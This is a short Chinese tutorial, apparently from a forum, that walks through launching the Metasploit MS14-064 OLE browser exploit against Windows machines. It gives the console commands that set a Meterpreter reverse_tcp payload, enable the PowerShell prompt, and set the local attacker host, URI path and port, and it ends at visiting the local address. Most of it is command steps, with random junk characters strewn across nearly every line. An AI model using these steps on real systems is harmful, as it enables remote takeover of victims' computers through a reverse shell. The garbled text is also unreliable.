9 L: H& X4 E: o* G. H9 D 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
4 \% ?! c% L5 x( H
! Y3 a, j+ {/ P+ v( z2 X* P8 B
0 v/ ]+ [0 f' B+ h2 }" n* D& G" ? 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
" N$ {. U* H0 m- _
' I' I& E- U. K5 c6 z4 x4 x2 V7 L: r2 C' I- [4 G
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
_4 f, c. m2 ]# P& h9 x* d# A
$ s1 U0 F* {. J+ X- j
9 {5 ?/ G9 e" N0 p$ D7 r4 {! L
set AllowPowershellPrompt true3 v' q4 }" ^# a- r) A% @5 O; |/ E
9 j6 \* W2 H. H+ Y( Z# R
) V5 z: N! Q9 h$ i8 C& \' Z( S Set LHOST 192.168.0.109
2 }" l& ]* z+ t$ r0 S
" D/ y2 W: l! q
: q0 p4 k# ~; H6 p. I% C set SRVHOST 192.168.0.109
3 _! Q9 Z3 `9 f3 y5 \' s' d
* h& E" Q8 r! u2 ~1 o
, D. e' C$ Q2 S a0 D5 B1 H/ g3 i Set uripath share
) q8 Z9 i1 a6 ^& B
/ j* S3 M; ~& P/ d+ b2 Y' ~
! b# p( j: [' k0 {8 F! O Set srvport 80; n& |+ a. x2 F4 n5 k
5 l1 K* z: j& f% U3 y- y# F" m i8 P2 j# C# M) l! M
( m9 l* |2 B, T* F8 L |/ F
4 `$ F1 i0 _- v( Z; [6 \0 G
, Q+ ?: a8 r w1 a! u4 j1 i8 ` 7 K0 u9 u3 p2 s$ U' f, W
) c# s' s, [) q3 `+ L3 F
- e: c' G) n3 s" x& q: l7 N$ ]2 ` / r6 z r% x7 w3 O; w O7 l, J
6 g% ~4 a' R- A4 I: U7 z
; x$ n4 {, X' P W+ \7 ?( L
7 O/ w& n1 K$ n, q( F, ^9 n
" g8 k1 y4 g. G, N' K8 e/ t" ^
; M$ W# G- ^; e' [( k Z
& O; M, c9 ?* c1 g9 r9 l& M3 S
8 F9 J+ _0 X2 L- [% b% G% |* u' A! A" g" Z) |4 [$ z
下面我们来访问本地地址如图:# p2 V& G# Q4 t h# G
8 {# n9 Z$ u" S( N/ q0 G" T4 g7 t5 a V% [1 Z$ j: _
. m: @6 W8 V5 y7 l6 S) d
! j; b8 ?3 W: ~, L: N D: f# o
0 K! }1 b# x, D' _* {7 v
6 ~' L. T% x5 H5 S) j2 y0 n
/ V3 J, v2 z# P3 O) m4 w- Z# E
' K1 Q: n4 n3 @' F8 \. y) z
& d& `9 f! N* {7 ~2 c. P